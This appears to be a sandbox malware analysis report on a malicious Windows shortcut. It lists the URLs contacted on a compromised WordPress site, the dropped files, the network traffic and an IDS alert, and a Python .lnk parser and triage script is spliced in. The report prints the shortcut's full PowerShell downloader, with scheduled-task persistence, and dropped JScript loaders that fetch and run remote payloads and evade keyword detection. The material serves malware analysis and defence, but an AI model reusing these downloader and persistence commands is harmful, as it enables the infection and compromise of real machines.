https://www.italialife24.it | powershell.exe, 00000000.00000002.1726859837.000001739B2CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739AE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B31C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAF18B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9694000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1726859837.000001739B5A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFF2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE5DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E84FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php | wscript.exe, 0000000F.00000002.2361872943.000001D1B2500000.00000004.00000020.00020000.00000000.sdmp, V58W09DALJEK.js.4.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000000.00000002.1726859837.000001739AE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAF18B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D94AB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php | powershell.exe, 00000000.00000002.1726668334.0000017397EE5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.microsc | powershell.exe, 0000000C.00000002.2448566614.000001E7F081A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.italialife24.it/wp-content/uploads/2021/0 | wscript.exe, 0000000B.00000002.2305543593.0000017912415000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1726859837.000001739B5A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFF2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE5DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E84FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmp | false | |
                            high
                            https://oneget.orgXpowershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.phppowershell.exe, 00000004.00000002.1882204354.0000026AC67F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://www.italialife24.it/wp-contentwscript.exe, wscript.exe, 00000011.00000002.2890351508.00000204119D5000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1726859837.0000017399C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAE561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D8351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED49000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.italialife24.it/wp-content/uploads/2021/05/awscript.exe, 00000011.00000002.2890351508.00000204119D5000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1wscript.exe, 0000000F.00000002.2361872943.000001D1B2500000.00000004.00000020.00020000.00000000.sdmp, V58W09DALJEK.js.4.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1726859837.0000017399C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAE561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D8351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED21000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.italialife24.it/wp-cwscript.exe, 00000007.00000002.1828005785.0000025EDB425000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2361827669.000001D1B0A15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38F1A2000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://oneget.orgpowershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://italialife24.itpowershell.exe, 00000000.00000002.1726859837.000001739B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B33C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFB3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D992C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.italialife24.itpowershell.exe, 00000000.00000002.1726859837.000001739B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B33C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFB3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D992C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.phppowershell.exe, 00000000.00000002.1726668334.0000017397EE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
IP:46.254.34.201
Domain:italialife24.it
Country:Italy
ASN:52030
ASN Name:SERVERPLAN-ASIT
Malicious:true
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1567188
                                        Start date and time:2024-12-03 09:13:08 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 9s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:G9eWTvswoH.lnk
                                        renamed because original name is a hash value
                                        Original Sample Name:9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839.lnk
                                        Detection:MAL
                                        Classification:mal100.expl.evad.winLNK@24/13@1/1
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 6
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .lnk
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time:03:13:58
Type:API Interceptor
Description:87x Sleep call for process: powershell.exe modified
Time:08:14:06
Type:Task Scheduler
Description:Run new task: ZA3XqiywQ path: wscript s>C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (398)
                                        Category:dropped
                                        Size (bytes):1288
                                        Entropy (8bit):5.72170098350198
                                        Encrypted:false
                                        SSDEEP:24:iJr+PoLb+CIzf5j1MVL+kUE+QQAVFC/sqQ1cEE2Rgjzku/uN:ErK0KZVjSVCRH2FCnMbl+Eu/uN
                                        MD5:1D680967CE8A3D3EB3FC67F686C992F2
                                        SHA1:BC5A5F69F25C1B9F767D6B4029F79C81B130176C
                                        SHA-256:24C3D8BAE328D856FF48BD6F99794DFB10660E9382873FC345F86047EABB0F95
                                        SHA-512:0DA5680AB836093E63BA7AA0B5392CFDBD4E5BDE8349293EB1F671252A31BD906133B4C2C3DCF30739E65D044F0B3788EF83935BBCE1874E0966F81F32F1742B
                                        Malicious:false
                                        Preview:var f1="Scr",f2="ing.Fi",f3="stemOb".var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject").var w1="WSc",w2="riPt",w4="eLl".var wsh=w1+w2+".sH"+w4.var bbj=new ActiveXObject(wsh).var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32".var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe".var agn='r'+bbj.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid')+'r.js'.if (WScript.ScriptName != agn) {..var fs5="yFi"..try {..fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\"+agn)..} catch (e) {}.}.var mtx_name="7zPES0BHTJI2".var mtx_file = bbj.ExpandEnvironmentStrings("%t"+"emp%")+"\\"+mtx_name.var fs1="leteFi".var fs2="leExis".try {..fso["De"+fs1+"le"](mtx_file).} catch (e) {}.if (!fso["Fi"+fs2+"ts"](mtx_file)).{..bbj.Run(rd+" -command \"$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'ht
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):304
                                        Entropy (8bit):5.380021514119105
                                        Encrypted:false
                                        SSDEEP:6:qcYrhvmVs8Gz797cfoKcMp4CFULvrlAZ9HFiVu5h3BbRnKcMp41JU:HYrhvF8879qoVGirauIBbRnV1JU
                                        MD5:47566E29D56EA47F58069F48CDCA14A9
                                        SHA1:EC9EA8C3A0F415FEF54C51EA37B00ACF6CCC0213
                                        SHA-256:7CF916C9DE8B6BABBD2FE06D2481739742769013F7AEC3FABBA9C1E6B799ADC1
                                        SHA-512:81C95FCE0AB20E467BB1589B1DD1AF01CFCE0A952D4D364BF8AB99AACFF0F3EC1BDBFDABA9D3150F19446CAF2E5256D36CACE2E0D5CB0F809E3EA1B83A40DDBF
                                        Malicious:true
                                        Preview:var fnn = new ActiveXObject("WScript.Shell")..fnn.Run("powershell -command \"IWR -outfi $env:programdata\\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + " /f; wscript $env:programdata\\V58W09DALJEK.js \"", 0)
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5394
                                        Entropy (8bit):3.5020047221931896
                                        Encrypted:false
                                        SSDEEP:48:ve1oxn6TQdLXuHI+eGXSlRa7SogZoieeGXSl4a7SogZoG1:G46TYuzemSW+HaemSn+Ht
                                        MD5:DC6D1768965503A275F546A0D1CF4411
                                        SHA1:F2446425196E49746C63DF408E2C3DC98AF156EA
                                        SHA-256:7B809A02BF2433AC37DFEAEFD34007F86B1B4BA784C6301BF18B16793FDAB921
                                        SHA-512:6336DABBD5372C2DFBD0E6C6F091CB2C966EF0E124CCBF0389B5BAFF42DA5834324973D8064C869566F600592B909E2CB50C5EBD10C8A89C7F1A359EAD7E2F01
                                        Malicious:false
                                        Preview:...................................FL..................F.`.. ...........C.L[E...]\L[E...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v............C.L[E....j.2......Y.A .G9EWTV~1.LNK..N......DWO`.Y.A..........................]...G.9.e.W.T.v.s.w.o.H...l.n.k.......T...............-.......S.............~J.....C:\Users\user\Desktop\G9eWTvswoH.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.................................................................................................................
                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:55 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
                                        Entropy (8bit):3.394498240949009
                                        TrID:
                                        • Windows Shortcut (20020/1) 100.00%
                                        File name:G9eWTvswoH.lnk
                                        File size:3'989 bytes
                                        MD5:f7f1052c9d09d61490d8f116238af21e
                                        SHA1:0f2550bb03f31716232de245a02823885f529e09
                                        SHA256:9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839
                                        SHA512:51737afa22f193a892525226575877a0893521ffd3dec18542a7f2b0cdef5807f736ae4458a5cf7f306c8e033fdacea870d9527529172f74cbbdbcde8a646568
                                        SSDEEP:48:8kk110gP1sAT1zP2b44bRVMXgyMZTEbS0AeyMZL2doITXuH8TeT0GYW:8kk12AsEs4CQQyMdCAeyMlraucSox
                                        TLSH:F381CC1027F50718F2F79F3DA8BAB216997BB955DD21CA8E10A0414D4872B10D866F7F
                                        File Content Preview:L..................F.B.. .....qf....|u?..@..N.rf.................................P.O. .:i.....+00.../C:\...................V.1.....sY....Windows.@........OwHzYD}.... .......................7.W.i.n.d.o.w.s.....Z.1.....zY+n..System32..B........OwHzY........
                                        Icon Hash:929e9e96a3f3d6ed

                                        General

                                        Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Command Line Argument: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
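The Relative Path, Command Line Argument and Icon location above are the StringData fields of the MS-SHLLINK format, read in fixed order after the 76-byte header, the optional LinkTargetIDList and the optional LinkInfo block. The parser and triage pass below are an added example written for this page, not Joe Sandbox code; the sample .lnk is built in memory from the three fields the report shows (icon index 11 and the minimised ShowCommand taken from the file type line), so every other header value in it is a placeholder, not bytes from the real sample.

```python
"""Minimal Shell Link (.lnk) parser plus a triage pass over the fields an analyst
checks first: target, arguments, icon and window state. Added example, not code
from the report; the sample file is constructed from the report's "General" fields."""
import re
import struct

# MS-SHLLINK fixed header: HeaderSize 0x4C, LinkCLSID {00021401-0000-0000-C000-000000000046}
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
LINK_FLAGS = {"HasLinkTargetIDList": 0x01, "HasLinkInfo": 0x02, "HasName": 0x04,
              "HasRelativePath": 0x08, "HasWorkingDir": 0x10, "HasArguments": 0x20,
              "HasIconLocation": 0x40, "IsUnicode": 0x80}
# StringData blocks follow in this fixed order, each present only when its flag is set
STRING_DATA = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
               ("arguments", 0x20), ("icon_location", 0x40))
SW_SHOWMINNOACTIVE = 7  # the "showminimized" window state in the file(1) output

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe")
DOWNLOAD_PRIMITIVES = ("net.webclient", "downloaddata", "downloadfile", "downloadstring",
                       "invoke-webrequest", "iwr", "start-bitstransfer", "certutil", "bitsadmin")
# Full PowerShell parameter names; any strict prefix of one is an accepted abbreviation
FULL_PARAMS = ("command", "encodedcommand", "outfile", "usebasicparsing", "windowstyle",
               "executionpolicy", "noprofile", "noninteractive", "uri")


def parse_lnk(data: bytes) -> dict:
    """Return header flags, ShowCommand and the StringData fields of a .lnk blob."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    show_cmd, = struct.unpack_from("<I", data, 0x3C)
    pos = LNK_HEADER_SIZE
    if flags & LINK_FLAGS["HasLinkTargetIDList"]:     # IDListSize (u16) followed by the IDList
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & LINK_FLAGS["HasLinkInfo"]:             # LinkInfoSize (u32) includes itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    unicode = bool(flags & LINK_FLAGS["IsUnicode"])
    out = {"flags": [n for n, b in LINK_FLAGS.items() if flags & b], "show_command": show_cmd}
    for field, bit in STRING_DATA:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)  # CountCharacters, not a byte count
        pos += 2
        nbytes = count * 2 if unicode else count
        out[field] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return out


def build_lnk(relative_path, arguments, icon_location, show_cmd=SW_SHOWMINNOACTIVE) -> bytes:
    """Constructed sample: Unicode .lnk with an empty IDList and three StringData fields."""
    flags = 0x01 | 0x08 | 0x20 | 0x40 | 0x80
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 11, show_cmd, 0, 0, 0, 0)  # attrs=ARCHIVE, icon index 11
    idlist = struct.pack("<HH", 2, 0)                 # IDListSize=2: only the TerminalID
    body = b""
    for s in (relative_path, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + idlist + body


def abbreviated_params(cmdline: str) -> list:
    """PowerShell binds any unique prefix of a parameter name; list the shortened ones."""
    found = []
    for tok in re.findall(r"(?<!\S)-([A-Za-z]+)", cmdline):
        low = tok.lower()
        if any(f.startswith(low) and low != f for f in FULL_PARAMS):
            found.append("-" + tok)
    return found


def triage(parsed: dict) -> dict:
    """Flag the traits of a downloader .lnk: script-host target, minimised window, URLs,
    download primitives, schtasks persistence, abbreviated switches, borrowed icon."""
    target = parsed.get("relative_path", "").rsplit("\\", 1)[-1].lower()
    args = parsed.get("arguments", "")
    low = args.lower()
    icon = parsed.get("icon_location", "").rsplit("\\", 1)[-1].lower()
    return {
        "script_host_target": target if target in SCRIPT_HOSTS else None,
        "starts_minimised": parsed.get("show_command") == SW_SHOWMINNOACTIVE,
        "urls": re.findall(r"https?://[^\s'\")]+", args),
        "download_primitives": [p for p in DOWNLOAD_PRIMITIVES
                                if re.search(r"(?<!\w)" + re.escape(p) + r"(?!\w)", low)],
        "schtasks_persistence": "schtasks /create" in low or "schtasks.exe /create" in low,
        "abbreviated_params": abbreviated_params(args),
        "icon_mismatch": icon if icon and icon != target else None,
    }


# The three fields as the report lists them for G9eWTvswoH.lnk
SAMPLE_RELATIVE_PATH = r"..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGUMENTS = (
    r"-comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; "
    r"$OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; "
    r"$cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); "
    r"$OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); "
    r"schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;"
)
SAMPLE_ICON = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
SAMPLE_LNK = build_lnk(SAMPLE_RELATIVE_PATH, SAMPLE_ARGUMENTS, SAMPLE_ICON)

if __name__ == "__main__":
    for key, value in triage(parse_lnk(SAMPLE_LNK)).items():
        print(f"{key}: {value}")
```

On this sample the triage reports a powershell.exe target launched minimised, two URLs, three download primitives, a `schtasks /create` action, the truncated `-comman` switch (PowerShell accepts any unambiguous prefix, so keyword lists that match `-command` miss it) and an Edge icon on a shortcut that runs PowerShell. Feed `parse_lnk` the bytes of a real shortcut to get the same fields the report's "General" section shows.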
                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                        2024-12-03T09:14:04.951516+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49731 | 46.254.34.201 | 443 | TCP
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Dec 3, 2024 09:14:00.791178942 CET | 49730 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:00.791213989 CET | 443 | 49730 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:00.791310072 CET | 49730 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:00.801026106 CET | 49730 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:00.801040888 CET | 443 | 49730 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:02.235208988 CET | 443 | 49730 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:02.235336065 CET | 49730 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:02.238095999 CET | 49730 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:02.238105059 CET | 443 | 49730 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:02.238362074 CET | 443 | 49730 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:02.251686096 CET | 49730 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:02.299329996 CET | 443 | 49730 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:02.773581982 CET | 443 | 49730 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:02.773648024 CET | 443 | 49730 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:02.773699045 CET | 49730 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:02.781229973 CET | 49730 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:02.786098003 CET | 49731 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:02.786135912 CET | 443 | 49731 | 46.254.34.201 | 192.168.2.4
                                        Dec 3, 2024 09:14:02.786233902 CET | 49731 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:02.787030935 CET | 49731 | 443 | 192.168.2.4 | 46.254.34.201
                                        Dec 3, 2024 09:14:02.787044048 CET | 443 | 49731 | 46.254.34.201 | 192.168.2.4
